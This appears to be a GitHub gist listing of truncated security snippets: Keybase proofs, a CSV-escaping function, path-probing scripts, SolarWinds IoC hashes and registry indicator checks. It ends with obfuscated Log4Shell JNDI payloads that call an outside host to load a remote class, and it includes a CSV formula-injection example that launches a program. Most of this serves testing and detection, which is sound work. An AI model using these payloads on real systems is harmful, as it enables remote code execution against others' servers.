I hereby claim:
- I am ZephrFish on github.
- I am zephrfish (https://keybase.io/zephrfish) on keybase.
- I have a public key whose fingerprint is FADA 204E 6BAE 1870 E42F D105 0DD0 B1CC 7DF5 ADC0
To claim this, I am signing this object:
### Keybase proof | |
I hereby claim: | |
* I am ZephrFish on github. | |
* I am zephrfish (https://keybase.io/zephrfish) on keybase. | |
* I have a public key whose fingerprint is EC67 4DC5 F2F0 87E5 598B B920 ED66 4E92 D071 41CA | |
To claim this, I am signing this object: |
def escape_csv(payload): | |
if payload[0] in ('@','+','-', '=', '|'): | |
payload = "'" + payload | |
payload = payload.replace("|", "\|") | |
return payload | |
# Example | |
payload = "@cmd|' /C calc'!A0" | |
print("The Unescaped version is: " + payload) | |
print("When passed though escape function the value is: " + escape_csv(payload)) |
I hereby claim:
To claim this, I am signing this object:
<html> | |
<head> | |
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"> | |
<link rel="stylesheet" type="text/css" href="css/custom.css"> | |
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"> | |
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script> | |
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script> | |
<title>Application Loader ZSEC-Net</title> | |
<style> | |
.ad-left { |
# Dir Checker | |
# Prints out URLs and Paths together | |
import itertools | |
import sys | |
def dirprint(urls, paths): | |
x = open(urls).read().split("\n") | |
y = open(paths).read().split("\n") | |
for a, b in itertools.product(x, y): | |
print("{}/{}".format(a, b)) |
import requests | |
import sys | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
def quickWin(url, paths): | |
with open(paths, 'r') as f: | |
for path in f.read().splitlines(): |
// Solarwinds Orion Hashes of Known Malicious IoCs | |
Sha256: 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 | |
Sha1: 2f1a5a7411d015d01aaee4535835400191645023 | |
Sha256: ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 | |
Sha1: d130bd75645c2433f88ac03e73395fba172ef676 | |
Sha256: 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 | |
Sha1: 76640508b1e7759e548771a5359eaed353bf1eec |
-7n | |
-9s | |
-er7kj | |
-gn | |
-jc5pe | |
-jlowd | |
-ka25u | |
-lxwg8exljmcqy | |
-wwgi2xnl | |
-xhi7z |
# Checks the registry for IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ | |
# If not vulnerable should return "ERROR: The system was unable to find the specified registry key or value." | |
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig" | |
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig" | |
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update" | |
# Checks the paths of IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ | |
# If not vulnerable each will return false | |
Test-Path C:\Windows\System32\Nwsapagent.sys | |
Test-Path C:\Windows\System32\helpsvc.sys |
${jndi:ldap://127.0.0.1:1389/ badClassName} | |
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} | |
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} |